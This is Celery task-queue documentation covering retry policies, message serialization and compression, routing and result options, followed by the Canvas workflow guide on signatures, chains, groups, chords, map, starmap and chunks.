hlist:: :columns: 2 - :setting:`task_publish_retry` - :setting:`task_publish_retry_policy` Retry Policy ------------ A retry policy is a mapping that controls how retries behave, and can contain the following keys: - `max_retries` Maximum number of retries before giving up, in this case the exception that caused the retry to fail will be raised. A value of :const:`None` means it will retry forever. The default is to retry 3 times. - `interval_start` Defines the number of seconds (float or integer) to wait between retries. Default is 0 (the first retry will be instantaneous). - `interval_step` On each consecutive retry this number will be added to the retry delay (float or integer). Default is 0.2. - `interval_max` Maximum number of seconds (float or integer) to wait between retries. Default is 0.2. For example, the default policy correlates to: .. code-block:: python add.apply_async((2, 2), retry=True, retry_policy={ 'max_retries': 3, 'interval_start': 0, 'interval_step': 0.2, 'interval_max': 0.2, }) the maximum time spent retrying will be 0.4 seconds. It's set relatively short by default because a connection failure could lead to a retry pile effect if the broker connection is down -- For example, many web server processes waiting to retry, blocking other incoming requests. .. _calling-connection-errors: Connection Error Handling ========================= When you send a task and the message transport connection is lost, or the connection cannot be initiated, an :exc:`~kombu.exceptions.OperationalError` error will be raised: .. code-block:: pycon >>> from proj.tasks import add >>> add.delay(2, 2) Traceback (most recent call last): File "", line 1, in File "celery/app/task.py", line 388, in delay return self.apply_async(args, kwargs) File "celery/app/task.py", line 503, in apply_async **options File "celery/app/base.py", line 662, in send_task amqp.send_task_message(P, name, message, **options) File "celery/backends/rpc.py", line 275, in on_task_call maybe_declare(self.binding(producer.channel), retry=True) File "/opt/celery/kombu/kombu/messaging.py", line 204, in _get_channel channel = self._channel = channel() File "/opt/celery/py-amqp/amqp/connection.py", line 272, in connect self.transport.connect() File "/opt/celery/py-amqp/amqp/transport.py", line 100, in connect self._connect(self.host, self.port, self.connect_timeout) File "/opt/celery/py-amqp/amqp/transport.py", line 141, in _connect self.sock.connect(sa) kombu.exceptions.OperationalError: [Errno 61] Connection refused If you have :ref:`retries ` enabled this will only happen after retries are exhausted, or when disabled immediately. You can handle this error too: .. code-block:: pycon >>> from celery.utils.log import get_logger >>> logger = get_logger(__name__) >>> try: ... add.delay(2, 2) ... except add.OperationalError as exc: ... logger.exception('Sending task raised: %r', exc) .. _calling-serializers: Serializers =========== .. sidebar:: Security The pickle module allows for execution of arbitrary functions, please see the :ref:`security guide `. Celery also comes with a special serializer that uses cryptography to sign your messages. Data transferred between clients and workers needs to be serialized, so every message in Celery has a ``content_type`` header that describes the serialization method used to encode it. The default serializer is `JSON`, but you can change this using the :setting:`task_serializer` setting, or for each individual task, or even per message. 
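For example, here's a minimal sketch of those three levels, assuming a placeholder ``app`` instance like the ones used earlier in this document (the serializer names are only illustrations):

.. code-block:: python

    from celery import Celery

    app = Celery('proj')  # placeholder app instance

    # For every task, via the configuration:
    app.conf.task_serializer = 'json'

    # For one task, via the task's serializer attribute:
    @app.task(serializer='json')
    def add(x, y):
        return x + y

    # For a single message, as an execution option when sending the task:
    add.apply_async((2, 2), serializer='json')

When more than one of these is set, the per-message option takes precedence over the task attribute, which in turn takes precedence over the setting, as described later in this section.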
There's built-in support for `JSON`, :mod:`pickle`, `YAML` and ``msgpack``, and you can also add your own custom serializers by registering them into the Kombu serializer registry .. seealso:: :ref:`Message Serialization ` in the Kombu user guide. Each option has its advantages and disadvantages. json -- JSON is supported in many programming languages, is now a standard part of Python (since 2.6), and is fairly fast to decode using the modern Python libraries, such as :pypi:`simplejson`. The primary disadvantage to JSON is that it limits you to the following data types: strings, Unicode, floats, Boolean, dictionaries, and lists. Decimals and dates are notably missing. Binary data will be transferred using Base64 encoding, increasing the size of the transferred data by 34% compared to an encoding format where native binary types are supported. However, if your data fits inside the above constraints and you need cross-language support, the default setting of JSON is probably your best choice. See http://json.org for more information. .. note:: (From Python official docs https://docs.python.org/3.6/library/json.html) Keys in key/value pairs of JSON are always of the type :class:`str`. When a dictionary is converted into JSON, all the keys of the dictionary are coerced to strings. As a result of this, if a dictionary is converted into JSON and then back into a dictionary, the dictionary may not equal the original one. That is, ``loads(dumps(x)) != x`` if x has non-string keys. pickle -- If you have no desire to support any language other than Python, then using the pickle encoding will gain you the support of all built-in Python data types (except class instances), smaller messages when sending binary files, and a slight speedup over JSON processing. See :mod:`pickle` for more information. yaml -- YAML has many of the same characteristics as json, except that it natively supports more data types (including dates, recursive references, etc.). However, the Python libraries for YAML are a good bit slower than the libraries for JSON. If you need a more expressive set of data types and need to maintain cross-language compatibility, then YAML may be a better fit than the above. See http://yaml.org/ for more information. msgpack -- msgpack is a binary serialization format that's closer to JSON in features. It's very young however, and support should be considered experimental at this point. See http://msgpack.org/ for more information. The encoding used is available as a message header, so the worker knows how to deserialize any task. If you use a custom serializer, this serializer must be available for the worker. The following order is used to decide the serializer used when sending a task: 1. The `serializer` execution option. 2. The :attr:`@-Task.serializer` attribute 3. The :setting:`task_serializer` setting. Example setting a custom serializer for a single task invocation: .. code-block:: pycon >>> add.apply_async((10, 10), serializer='json') .. _calling-compression: Compression =========== Celery can compress messages using the following builtin schemes: - `brotli` brotli is optimized for the web, in particular small text documents. It is most effective for serving static content such as fonts and html pages. To use it, install Celery with: .. code-block:: console $ pip install celery[brotli] - `bzip2` bzip2 creates smaller files than gzip, but compression and decompression speeds are noticeably slower than those of gzip. 
To use it, please ensure your Python executable was compiled with bzip2 support. If you get the following :class:`ImportError`: .. code-block:: pycon >>> import bz2 Traceback (most recent call last): File "", line 1, in ImportError: No module named 'bz2' it means that you should recompile your Python version with bzip2 support. - `gzip` gzip is suitable for systems that require a small memory footprint, making it ideal for systems with limited memory. It is often used to generate files with the ".tar.gz" extension. To use it, please ensure your Python executable was compiled with gzip support. If you get the following :class:`ImportError`: .. code-block:: pycon >>> import gzip Traceback (most recent call last): File "", line 1, in ImportError: No module named 'gzip' it means that you should recompile your Python version with gzip support. - `lzma` lzma provides a good compression ratio and executes with fast compression and decompression speeds at the expense of higher memory usage. To use it, please ensure your Python executable was compiled with lzma support and that your Python version is 3.3 and above. If you get the following :class:`ImportError`: .. code-block:: pycon >>> import lzma Traceback (most recent call last): File "", line 1, in ImportError: No module named 'lzma' it means that you should recompile your Python version with lzma support. Alternatively, you can also install a backport using: .. code-block:: console $ pip install celery[lzma] - `zlib` zlib is an abstraction of the Deflate algorithm in library form which includes support both for the gzip file format and a lightweight stream format in its API. It is a crucial component of many software systems - Linux kernel and Git VCS just to name a few. To use it, please ensure your Python executable was compiled with zlib support. If you get the following :class:`ImportError`: .. code-block:: pycon >>> import zlib Traceback (most recent call last): File "", line 1, in ImportError: No module named 'zlib' it means that you should recompile your Python version with zlib support. - `zstd` zstd targets real-time compression scenarios at zlib-level and better compression ratios. It's backed by a very fast entropy stage, provided by Huff0 and FSE library. To use it, install Celery with: .. code-block:: console $ pip install celery[zstd] You can also create your own compression schemes and register them in the :func:`kombu compression registry `. The following order is used to decide the compression scheme used when sending a task: 1. The `compression` execution option. 2. The :attr:`@-Task.compression` attribute. 3. The :setting:`task_compression` attribute. Example specifying the compression used when calling a task:: >>> add.apply_async((2, 2), compression='zlib') .. _calling-connections: Connections =========== .. sidebar:: Automatic Pool Support Since version 2.3 there's support for automatic connection pools, so you don't have to manually handle connections and publishers to reuse connections. The connection pool is enabled by default since version 2.5. See the :setting:`broker_pool_limit` setting for more information. You can handle the connection manually by creating a publisher: .. code-block:: python results = [] with add.app.pool.acquire(block=True) as connection: with add.get_publisher(connection) as publisher: try: for args in numbers: res = add.apply_async((2, 2), publisher=publisher) results.append(res) print([res.get() for res in results]) Though this particular example is much better expressed as a group: .. 
code-block:: pycon >>> from celery import group >>> numbers = [(2, 2), (4, 4), (8, 8), (16, 16)] >>> res = group(add.s(i, j) for i, j in numbers).apply_async() >>> res.get() [4, 8, 16, 32] .. _calling-routing: Routing options =============== Celery can route tasks to different queues. Simple routing (name <-> name) is accomplished using the ``queue`` option:: add.apply_async(queue='priority.high') You can then assign workers to the ``priority.high`` queue by using the workers :option:`-Q ` argument: .. code-block:: console $ celery -A proj worker -l INFO -Q celery,priority.high .. seealso:: Hard-coding queue names in code isn't recommended, the best practice is to use configuration routers (:setting:`task_routes`). To find out more about routing, please see :ref:`guide-routing`. .. _calling-results: Results options =============== You can enable or disable result storage using the :setting:`task_ignore_result` setting or by using the ``ignore_result`` option: .. code-block:: pycon >>> result = add.apply_async((1, 2), ignore_result=True) >>> result.get() None >>> # Do not ignore result (default) ... >>> result = add.apply_async((1, 2), ignore_result=False) >>> result.get() 3 If you'd like to store additional metadata about the task in the result backend set the :setting:`result_extended` setting to ``True``. .. seealso:: For more information on tasks, please see :ref:`guide-tasks`. Advanced Options ---------------- These options are for advanced users who want to take use of AMQP's full routing capabilities. Interested parties may read the :ref:`routing guide `. - exchange Name of exchange (or a :class:`kombu.entity.Exchange`) to send the message to. - routing_key Routing key used to determine. - priority A number between `0` and `255`, where `255` is the highest priority. Supported by: RabbitMQ, Redis (priority reversed, 0 is highest). ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/canvas.rst0000664000175000017500000007416000000000000017636 0ustar00asifasif00000000000000.. _guide-canvas: ============================== Canvas: Designing Work-flows ============================== .. contents:: :local: :depth: 2 .. _canvas-subtasks: .. _canvas-signatures: Signatures ========== .. versionadded:: 2.0 You just learned how to call a task using the tasks ``delay`` method in the :ref:`calling ` guide, and this is often all you need, but sometimes you may want to pass the signature of a task invocation to another process or as an argument to another function. A :func:`~celery.signature` wraps the arguments, keyword arguments, and execution options of a single task invocation in a way such that it can be passed to functions or even serialized and sent across the wire. - You can create a signature for the ``add`` task using its name like this: .. code-block:: pycon >>> from celery import signature >>> signature('tasks.add', args=(2, 2), countdown=10) tasks.add(2, 2) This task has a signature of arity 2 (two arguments): ``(2, 2)``, and sets the countdown execution option to 10. - or you can create one using the task's ``signature`` method: .. code-block:: pycon >>> add.signature((2, 2), countdown=10) tasks.add(2, 2) - There's also a shortcut using star arguments: .. code-block:: pycon >>> add.s(2, 2) tasks.add(2, 2) - Keyword arguments are also supported: .. code-block:: pycon >>> add.s(2, 2, debug=True) tasks.add(2, 2, debug=True) - From any signature instance you can inspect the different fields: .. 
code-block:: pycon >>> s = add.signature((2, 2), {'debug': True}, countdown=10) >>> s.args (2, 2) >>> s.kwargs {'debug': True} >>> s.options {'countdown': 10} - It supports the "Calling API" of ``delay``, ``apply_async``, etc., including being called directly (``__call__``). Calling the signature will execute the task inline in the current process: .. code-block:: pycon >>> add(2, 2) 4 >>> add.s(2, 2)() 4 ``delay`` is our beloved shortcut to ``apply_async`` taking star-arguments: .. code-block:: pycon >>> result = add.delay(2, 2) >>> result.get() 4 ``apply_async`` takes the same arguments as the :meth:`Task.apply_async <@Task.apply_async>` method: .. code-block:: pycon >>> add.apply_async(args, kwargs, **options) >>> add.signature(args, kwargs, **options).apply_async() >>> add.apply_async((2, 2), countdown=1) >>> add.signature((2, 2), countdown=1).apply_async() - You can't define options with :meth:`~@Task.s`, but a chaining ``set`` call takes care of that: .. code-block:: pycon >>> add.s(2, 2).set(countdown=1) proj.tasks.add(2, 2) Partials -------- With a signature, you can execute the task in a worker: .. code-block:: pycon >>> add.s(2, 2).delay() >>> add.s(2, 2).apply_async(countdown=1) Or you can call it directly in the current process: .. code-block:: pycon >>> add.s(2, 2)() 4 Specifying additional args, kwargs, or options to ``apply_async``/``delay`` creates partials: - Any arguments added will be prepended to the args in the signature: .. code-block:: pycon >>> partial = add.s(2) # incomplete signature >>> partial.delay(4) # 4 + 2 >>> partial.apply_async((4,)) # same - Any keyword arguments added will be merged with the kwargs in the signature, with the new keyword arguments taking precedence: .. code-block:: pycon >>> s = add.s(2, 2) >>> s.delay(debug=True) # -> add(2, 2, debug=True) >>> s.apply_async(kwargs={'debug': True}) # same - Any options added will be merged with the options in the signature, with the new options taking precedence: .. code-block:: pycon >>> s = add.signature((2, 2), countdown=10) >>> s.apply_async(countdown=1) # countdown is now 1 You can also clone signatures to create derivatives: .. code-block:: pycon >>> s = add.s(2) proj.tasks.add(2) >>> s.clone(args=(4,), kwargs={'debug': True}) proj.tasks.add(4, 2, debug=True) Immutability ------------ .. versionadded:: 3.0 Partials are meant to be used with callbacks, any tasks linked, or chord callbacks will be applied with the result of the parent task. Sometimes you want to specify a callback that doesn't take additional arguments, and in that case you can set the signature to be immutable: .. code-block:: pycon >>> add.apply_async((2, 2), link=reset_buffers.signature(immutable=True)) The ``.si()`` shortcut can also be used to create immutable signatures: .. code-block:: pycon >>> add.apply_async((2, 2), link=reset_buffers.si()) Only the execution options can be set when a signature is immutable, so it's not possible to call the signature with partial args/kwargs. .. note:: In this tutorial I sometimes use the prefix operator `~` to signatures. You probably shouldn't use it in your production code, but it's a handy shortcut when experimenting in the Python shell: .. code-block:: pycon >>> ~sig >>> # is the same as >>> sig.delay().get() .. _canvas-callbacks: Callbacks --------- .. versionadded:: 3.0 Callbacks can be added to any task using the ``link`` argument to ``apply_async``: .. 
code-block:: pycon add.apply_async((2, 2), link=other_task.s()) The callback will only be applied if the task exited successfully, and it will be applied with the return value of the parent task as argument. As I mentioned earlier, any arguments you add to a signature, will be prepended to the arguments specified by the signature itself! If you have the signature: .. code-block:: pycon >>> sig = add.s(10) then `sig.delay(result)` becomes: .. code-block:: pycon >>> add.apply_async(args=(result, 10)) ... Now let's call our ``add`` task with a callback using partial arguments: .. code-block:: pycon >>> add.apply_async((2, 2), link=add.s(8)) As expected this will first launch one task calculating :math:`2 + 2`, then another task calculating :math:`4 + 8`. The Primitives ============== .. versionadded:: 3.0 .. topic:: Overview - ``group`` The group primitive is a signature that takes a list of tasks that should be applied in parallel. - ``chain`` The chain primitive lets us link together signatures so that one is called after the other, essentially forming a *chain* of callbacks. - ``chord`` A chord is just like a group but with a callback. A chord consists of a header group and a body, where the body is a task that should execute after all of the tasks in the header are complete. - ``map`` The map primitive works like the built-in ``map`` function, but creates a temporary task where a list of arguments is applied to the task. For example, ``task.map([1, 2])`` -- results in a single task being called, applying the arguments in order to the task function so that the result is: .. code-block:: python res = [task(1), task(2)] - ``starmap`` Works exactly like map except the arguments are applied as ``*args``. For example ``add.starmap([(2, 2), (4, 4)])`` results in a single task calling: .. code-block:: python res = [add(2, 2), add(4, 4)] - ``chunks`` Chunking splits a long list of arguments into parts, for example the operation: .. code-block:: pycon >>> items = zip(range(1000), range(1000)) # 1000 items >>> add.chunks(items, 10) will split the list of items into chunks of 10, resulting in 100 tasks (each processing 10 items in sequence). The primitives are also signature objects themselves, so that they can be combined in any number of ways to compose complex work-flows. Here's some examples: - Simple chain Here's a simple chain, the first task executes passing its return value to the next task in the chain, and so on. .. code-block:: pycon >>> from celery import chain >>> # 2 + 2 + 4 + 8 >>> res = chain(add.s(2, 2), add.s(4), add.s(8))() >>> res.get() 16 This can also be written using pipes: .. code-block:: pycon >>> (add.s(2, 2) | add.s(4) | add.s(8))().get() 16 - Immutable signatures Signatures can be partial so arguments can be added to the existing arguments, but you may not always want that, for example if you don't want the result of the previous task in a chain. In that case you can mark the signature as immutable, so that the arguments cannot be changed: .. code-block:: pycon >>> add.signature((2, 2), immutable=True) There's also a ``.si()`` shortcut for this, and this is the preferred way of creating signatures: .. code-block:: pycon >>> add.si(2, 2) Now you can create a chain of independent tasks instead: .. code-block:: pycon >>> res = (add.si(2, 2) | add.si(4, 4) | add.si(8, 8))() >>> res.get() 16 >>> res.parent.get() 8 >>> res.parent.parent.get() 4 - Simple group You can easily create a group of tasks to execute in parallel: .. 
code-block:: pycon

    >>> from celery import group
    >>> res = group(add.s(i, i) for i in range(10))()
    >>> res.get(timeout=1)
    [0, 2, 4, 6, 8, 10, 12, 14, 16, 18]

- Simple chord

  The chord primitive enables us to add a callback to be called when
  all of the tasks in a group have finished executing. This is often
  required for algorithms that aren't *embarrassingly parallel*:

  .. code-block:: pycon

      >>> from celery import chord
      >>> res = chord((add.s(i, i) for i in range(10)), xsum.s())()
      >>> res.get()
      90

  The above example creates 10 tasks that all start in parallel,
  and when all of them are complete the return values are combined
  into a list and sent to the ``xsum`` task.

  The body of a chord can also be immutable, so that the return value
  of the group isn't passed on to the callback:

  .. code-block:: pycon

      >>> chord((import_contact.s(c) for c in contacts),
      ...       notify_complete.si(import_id)).apply_async()

  Note the use of ``.si`` above; this creates an immutable signature,
  meaning any new arguments passed (including the return value of the
  previous task) will be ignored.

- Blow your mind by combining

  Chains can be partial too:

  .. code-block:: pycon

      >>> c1 = (add.s(4) | mul.s(8))  # (16 + 4) * 8
      >>> res = c1(16)
      >>> res.get()
      160

  This means that you can combine chains:

  .. code-block:: pycon

      # ((4 + 16) * 2 + 4) * 8
      >>> c2 = (add.s(4, 16) | mul.s(2) | (add.s(4) | mul.s(8)))
      >>> res = c2()
      >>> res.get()
      352

  Chaining a group together with another task will automatically
  upgrade it to be a chord:

  .. code-block:: pycon

      >>> c3 = (group(add.s(i, i) for i in range(10)) | xsum.s())
      >>> res = c3()
      >>> res.get()
      90

  Groups and chords accept partial arguments too, so in a chain
  the return value of the previous task is forwarded to all tasks
  in the group:

  .. code-block:: pycon

      >>> new_user_workflow = (create_user.s() | group(
      ...                      import_contacts.s(),
      ...                      send_welcome_email.s()))
      ... new_user_workflow.delay(username='artv',
      ...                         first='Art',
      ...                         last='Vandelay',
      ...                         email='art@vandelay.com')

  If you don't want to forward arguments to the group then
  you can make the signatures in the group immutable:

  .. code-block:: pycon

      >>> res = (add.s(4, 4) | group(add.si(i, i) for i in range(10)))()
      >>> res.get()

      >>> res.parent.get()
      8

.. _canvas-chain:

Chains
------

.. versionadded:: 3.0

Tasks can be linked together: the linked task is called when the task
returns successfully:

.. code-block:: pycon

    >>> res = add.apply_async((2, 2), link=mul.s(16))
    >>> res.get()
    4

The linked task will be applied with the result of its parent
task as the first argument. In the above case where the result was 4,
this will result in ``mul(4, 16)``.

The results will keep track of any subtasks called by the original task,
and this can be accessed from the result instance:

.. code-block:: pycon

    >>> res.children
    []

    >>> res.children[0].get()
    64

The result instance also has a :meth:`~@AsyncResult.collect` method
that treats the result as a graph, enabling you to iterate over
the results:

.. code-block:: pycon

    >>> list(res.collect())
    [(, 4),
     (, 64)]

By default :meth:`~@AsyncResult.collect` will raise an
:exc:`~@IncompleteStream` exception if the graph isn't fully
formed (one of the tasks hasn't completed yet),
but you can get an intermediate representation of the graph
too:

.. code-block:: pycon

    >>> for result, value in res.collect(intermediate=True):
    ....

You can link together as many tasks as you like,
and signatures can be linked too:

..
code-block:: pycon >>> s = add.s(2, 2) >>> s.link(mul.s(4)) >>> s.link(log_result.s()) You can also add *error callbacks* using the `on_error` method: .. code-block:: pycon >>> add.s(2, 2).on_error(log_error.s()).delay() This will result in the following ``.apply_async`` call when the signature is applied: .. code-block:: pycon >>> add.apply_async((2, 2), link_error=log_error.s()) The worker won't actually call the errback as a task, but will instead call the errback function directly so that the raw request, exception and traceback objects can be passed to it. Here's an example errback: .. code-block:: python from __future__ import print_function import os from proj.celery import app @app.task def log_error(request, exc, traceback): with open(os.path.join('/var/errors', request.id), 'a') as fh: print('--\n\n{0} {1} {2}'.format( request.id, exc, traceback), file=fh) To make it even easier to link tasks together there's a special signature called :class:`~celery.chain` that lets you chain tasks together: .. code-block:: pycon >>> from celery import chain >>> from proj.tasks import add, mul >>> # (4 + 4) * 8 * 10 >>> res = chain(add.s(4, 4), mul.s(8), mul.s(10)) proj.tasks.add(4, 4) | proj.tasks.mul(8) | proj.tasks.mul(10) Calling the chain will call the tasks in the current process and return the result of the last task in the chain: .. code-block:: pycon >>> res = chain(add.s(4, 4), mul.s(8), mul.s(10))() >>> res.get() 640 It also sets ``parent`` attributes so that you can work your way up the chain to get intermediate results: .. code-block:: pycon >>> res.parent.get() 64 >>> res.parent.parent.get() 8 >>> res.parent.parent Chains can also be made using the ``|`` (pipe) operator: .. code-block:: pycon >>> (add.s(2, 2) | mul.s(8) | mul.s(10)).apply_async() Graphs ~~~~~~ In addition you can work with the result graph as a :class:`~celery.utils.graph.DependencyGraph`: .. code-block:: pycon >>> res = chain(add.s(4, 4), mul.s(8), mul.s(10))() >>> res.parent.parent.graph 285fa253-fcf8-42ef-8b95-0078897e83e6(1) 463afec2-5ed4-4036-b22d-ba067ec64f52(0) 872c3995-6fa0-46ca-98c2-5a19155afcf0(2) 285fa253-fcf8-42ef-8b95-0078897e83e6(1) 463afec2-5ed4-4036-b22d-ba067ec64f52(0) You can even convert these graphs to *dot* format: .. code-block:: pycon >>> with open('graph.dot', 'w') as fh: ... res.parent.parent.graph.to_dot(fh) and create images: .. code-block:: console $ dot -Tpng graph.dot -o graph.png .. image:: ../images/result_graph.png .. _canvas-group: Groups ------ .. versionadded:: 3.0 A group can be used to execute several tasks in parallel. The :class:`~celery.group` function takes a list of signatures: .. code-block:: pycon >>> from celery import group >>> from proj.tasks import add >>> group(add.s(2, 2), add.s(4, 4)) (proj.tasks.add(2, 2), proj.tasks.add(4, 4)) If you **call** the group, the tasks will be applied one after another in the current process, and a :class:`~celery.result.GroupResult` instance is returned that can be used to keep track of the results, or tell how many tasks are ready and so on: .. code-block:: pycon >>> g = group(add.s(2, 2), add.s(4, 4)) >>> res = g() >>> res.get() [4, 8] Group also supports iterators: .. code-block:: pycon >>> group(add.s(i, i) for i in range(100))() A group is a signature object, so it can be used in combination with other signatures. .. 
_group-callbacks:

Group Callbacks and Error Handling
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Groups can have callback and errback signatures linked to them as well,
however the behaviour can be somewhat surprising because groups are not
real tasks and simply pass linked tasks down to their encapsulated
signatures. This means that the return values of a group are not
collected to be passed to a linked callback signature. As an example,
the following snippet using a simple `add(a, b)` task is faulty since
the linked `add.s()` signature will not receive the finalised group
result as one might expect.

.. code-block:: pycon

    >>> g = group(add.s(2, 2), add.s(4, 4))
    >>> g.link(add.s())
    >>> res = g()
    [4, 8]

Note that the finalised results of the first two tasks are returned,
but the callback signature will have run in the background and raised
an exception since it did not receive the two arguments it expects.

Group errbacks are passed down to encapsulated signatures as well which
opens the possibility for an errback linked only once to be called more
than once if multiple tasks in a group were to fail. As an example, the
following snippet using a `fail()` task which raises an exception can
be expected to invoke the `log_error()` signature once for each failing
task which gets run in the group.

.. code-block:: pycon

    >>> g = group(fail.s(), fail.s())
    >>> g.link_error(log_error.s())
    >>> res = g()

With this in mind, it's generally advisable to create idempotent or
counting tasks which are tolerant to being called repeatedly for use
as errbacks. These use cases are better addressed by the
:class:`~celery.chord` class which is supported on certain backend
implementations.

.. _group-results:

Group Results
~~~~~~~~~~~~~

The group task returns a special result too; this result works just
like normal task results, except that it works on the group as a whole:

.. code-block:: pycon

    >>> from celery import group
    >>> from tasks import add

    >>> job = group([
    ...             add.s(2, 2),
    ...             add.s(4, 4),
    ...             add.s(8, 8),
    ...             add.s(16, 16),
    ...             add.s(32, 32),
    ... ])

    >>> result = job.apply_async()

    >>> result.ready()  # have all subtasks completed?
    True
    >>> result.successful()  # were all subtasks successful?
    True
    >>> result.get()
    [4, 8, 16, 32, 64]

The :class:`~celery.result.GroupResult` takes a list of
:class:`~celery.result.AsyncResult` instances and operates on them as
if it was a single task.

It supports the following operations:

* :meth:`~celery.result.GroupResult.successful`

    Return :const:`True` if all of the subtasks finished
    successfully (e.g., didn't raise an exception).

* :meth:`~celery.result.GroupResult.failed`

    Return :const:`True` if any of the subtasks failed.

* :meth:`~celery.result.GroupResult.waiting`

    Return :const:`True` if any of the subtasks
    isn't ready yet.

* :meth:`~celery.result.GroupResult.ready`

    Return :const:`True` if all of the subtasks
    are ready.

* :meth:`~celery.result.GroupResult.completed_count`

    Return the number of completed subtasks.

* :meth:`~celery.result.GroupResult.revoke`

    Revoke all of the subtasks.

* :meth:`~celery.result.GroupResult.join`

    Gather the results of all subtasks
    and return them in the same order as they were called (as a list).

.. _canvas-chord:

Chords
------

.. versionadded:: 2.3

.. note::

    Tasks used within a chord must *not* ignore their results. If the
    result backend is disabled for *any* task (header or body) in your
    chord you should read ":ref:`chord-important-notes`." Chords are not
    currently supported with the RPC result backend.
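Before looking at chord examples, here is a minimal sketch of what the
note above implies in configuration terms. It assumes a Redis result
backend purely for illustration; any supported backend other than RPC
works the same way:

.. code-block:: python

    # A result backend must be configured for chords to work
    # (Redis is only an example here).
    app.conf.result_backend = 'redis://localhost:6379/0'

    # Tasks used in the chord header or body must not ignore their
    # results, even if task_ignore_result is enabled globally.
    @app.task(ignore_result=False)
    def add(x, y):
        return x + y
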
A chord is a task that only executes after all of the tasks in a group have finished executing. Let's calculate the sum of the expression :math:`1 + 1 + 2 + 2 + 3 + 3 ... n + n` up to a hundred digits. First you need two tasks, :func:`add` and :func:`tsum` (:func:`sum` is already a standard function): .. code-block:: python @app.task def add(x, y): return x + y @app.task def tsum(numbers): return sum(numbers) Now you can use a chord to calculate each addition step in parallel, and then get the sum of the resulting numbers: .. code-block:: pycon >>> from celery import chord >>> from tasks import add, tsum >>> chord(add.s(i, i) ... for i in range(100))(tsum.s()).get() 9900 This is obviously a very contrived example, the overhead of messaging and synchronization makes this a lot slower than its Python counterpart: .. code-block:: pycon >>> sum(i + i for i in range(100)) The synchronization step is costly, so you should avoid using chords as much as possible. Still, the chord is a powerful primitive to have in your toolbox as synchronization is a required step for many parallel algorithms. Let's break the chord expression down: .. code-block:: pycon >>> callback = tsum.s() >>> header = [add.s(i, i) for i in range(100)] >>> result = chord(header)(callback) >>> result.get() 9900 Remember, the callback can only be executed after all of the tasks in the header have returned. Each step in the header is executed as a task, in parallel, possibly on different nodes. The callback is then applied with the return value of each task in the header. The task id returned by :meth:`chord` is the id of the callback, so you can wait for it to complete and get the final return value (but remember to :ref:`never have a task wait for other tasks `) .. _chord-errors: Error handling ~~~~~~~~~~~~~~ So what happens if one of the tasks raises an exception? The chord callback result will transition to the failure state, and the error is set to the :exc:`~@ChordError` exception: .. code-block:: pycon >>> c = chord([add.s(4, 4), raising_task.s(), add.s(8, 8)]) >>> result = c() >>> result.get() .. code-block:: pytb Traceback (most recent call last): File "", line 1, in File "*/celery/result.py", line 120, in get interval=interval) File "*/celery/backends/amqp.py", line 150, in wait_for raise meta['result'] celery.exceptions.ChordError: Dependency 97de6f3f-ea67-4517-a21c-d867c61fcb47 raised ValueError('something something',) While the traceback may be different depending on the result backend used, you can see that the error description includes the id of the task that failed and a string representation of the original exception. You can also find the original traceback in ``result.traceback``. Note that the rest of the tasks will still execute, so the third task (``add.s(8, 8)``) is still executed even though the middle task failed. Also the :exc:`~@ChordError` only shows the task that failed first (in time): it doesn't respect the ordering of the header group. To perform an action when a chord fails you can therefore attach an errback to the chord callback: .. code-block:: python @app.task def on_chord_error(request, exc, traceback): print('Task {0!r} raised error: {1!r}'.format(request.id, exc)) .. code-block:: pycon >>> c = (group(add.s(i, i) for i in range(10)) | ... xsum.s().on_error(on_chord_error.s())).delay() Chords may have callback and errback signatures linked to them, which addresses some of the issues with linking signatures to groups. 
Doing so will link the provided signature to the chord's body which can be expected to gracefully invoke callbacks just once upon completion of the body, or errbacks just once if any task in the chord header or body fails. .. _chord-important-notes: Important Notes ~~~~~~~~~~~~~~~ Tasks used within a chord must *not* ignore their results. In practice this means that you must enable a :const:`result_backend` in order to use chords. Additionally, if :const:`task_ignore_result` is set to :const:`True` in your configuration, be sure that the individual tasks to be used within the chord are defined with :const:`ignore_result=False`. This applies to both Task subclasses and decorated tasks. Example Task subclass: .. code-block:: python class MyTask(Task): ignore_result = False Example decorated task: .. code-block:: python @app.task(ignore_result=False) def another_task(project): do_something() By default the synchronization step is implemented by having a recurring task poll the completion of the group every second, calling the signature when ready. Example implementation: .. code-block:: python from celery import maybe_signature @app.task(bind=True) def unlock_chord(self, group, callback, interval=1, max_retries=None): if group.ready(): return maybe_signature(callback).delay(group.join()) raise self.retry(countdown=interval, max_retries=max_retries) This is used by all result backends except Redis and Memcached: they increment a counter after each task in the header, then applies the callback when the counter exceeds the number of tasks in the set. The Redis and Memcached approach is a much better solution, but not easily implemented in other backends (suggestions welcome!). .. note:: Chords don't properly work with Redis before version 2.2; you'll need to upgrade to at least redis-server 2.2 to use them. .. note:: If you're using chords with the Redis result backend and also overriding the :meth:`Task.after_return` method, you need to make sure to call the super method or else the chord callback won't be applied. .. code-block:: python def after_return(self, *args, **kwargs): do_something() super().after_return(*args, **kwargs) .. _canvas-map: Map & Starmap ------------- :class:`~celery.map` and :class:`~celery.starmap` are built-in tasks that call the provided calling task for every element in a sequence. They differ from :class:`~celery.group` in that: - only one task message is sent. - the operation is sequential. For example using ``map``: .. code-block:: pycon >>> from proj.tasks import add >>> ~xsum.map([range(10), range(100)]) [45, 4950] is the same as having a task doing: .. code-block:: python @app.task def temp(): return [xsum(range(10)), xsum(range(100))] and using ``starmap``: .. code-block:: pycon >>> ~add.starmap(zip(range(10), range(10))) [0, 2, 4, 6, 8, 10, 12, 14, 16, 18] is the same as having a task doing: .. code-block:: python @app.task def temp(): return [add(i, i) for i in range(10)] Both ``map`` and ``starmap`` are signature objects, so they can be used as other signatures and combined in groups etc., for example to call the starmap after 10 seconds: .. code-block:: pycon >>> add.starmap(zip(range(10), range(10))).apply_async(countdown=10) .. _canvas-chunks: Chunks ------ Chunking lets you divide an iterable of work into pieces, so that if you have one million objects, you can create 10 tasks with a hundred thousand objects each. 
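As a rough sketch of that arithmetic (assuming the same ``add`` task used
in the earlier examples), one million argument pairs split into chunks of
one hundred thousand yields just ten task messages:

.. code-block:: pycon

    >>> items = list(zip(range(1000000), range(1000000)))  # one million (x, y) pairs
    >>> add.chunks(items, 100000)  # 1,000,000 items / 100,000 per chunk -> 10 tasks
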
